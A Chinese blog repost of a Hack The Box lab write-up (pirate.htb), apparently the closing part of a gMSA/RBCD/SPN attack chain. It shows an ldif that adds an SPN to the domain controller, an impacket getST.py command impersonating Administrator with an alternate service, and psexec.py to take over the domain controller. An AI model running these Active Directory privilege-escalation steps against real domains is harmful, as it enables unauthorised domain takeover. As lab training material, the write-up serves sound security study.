一台HTB靶机学会gMSA/RBCD/SPN三大攻击技巧

admin 2026-07-02 06:00:28 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: 该文档详细记录了针对HTB靶机pirate.htb的内网渗透过程,涉及gMSA密码提取、NTLM中继攻击和基于资源的受限委派(RBCD)利用。通过BloodHound分析域内权限关系,利用MS01$计算机账户读取gMSA服务账户密码,再通过PetitPotam触发NTLM中继在域内创建可控计算机账户ATTACKER$,最终通过S4U2Proxy攻击获取WEB01主机Administrator权限。文档提供了完整的攻击链实操命令和调试技巧。 综合评分: 85 文章分类: 内网渗透,红队,实战经验,WEB安全,漏洞分析


这样就修改 ldap 了

接着添加 SPN 到 DC01,准备 spn_add.ldif

dn: CN=DC01,OU=Domain Controllers,DC=pirate,DC=htb
changetype: modify
add: servicePrincipalName
servicePrincipalName: HTTP/WEB01.pirate.htb

运行

ldapmodify -x -H ldap://DC01.pirate.htb -D "PIRATE\\a.white_adm" -w 'NewP@ss2026!' -f spn_add.ldif

现在HTTP/WEB01.pirate.htb解析为DC01。Kerberos不会验证SPN“属于”该对象——它只是查找映射,接下来请求管理员票据,使用altservice

unset KRB5CCNAME
sudo sntp -sS 10.129.244.95

getST.py PIRATE.HTB/a.white_adm:'NewP@ss2026!' -spn HTTP/WEB01.pirate.htb -impersonate Administrator -dc-ip 10.129.244.95 -altservice CIFS/DC01.pirate.htb -debug

这里也是保存成功了

接下来接管域管,如果跑不了需要修改一下时间

export KRB5CCNAME=Administrator@[email protected]
psexec.py -k -no-pass DC01.pirate.htb
type C:\Users\Administrator\Desktop\root.txt


免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:Gh0xE9 IceCliffs IceCliffs《一台HTB靶机学会gMSA/RBCD/SPN三大攻击技巧》

评论:0   参与:  0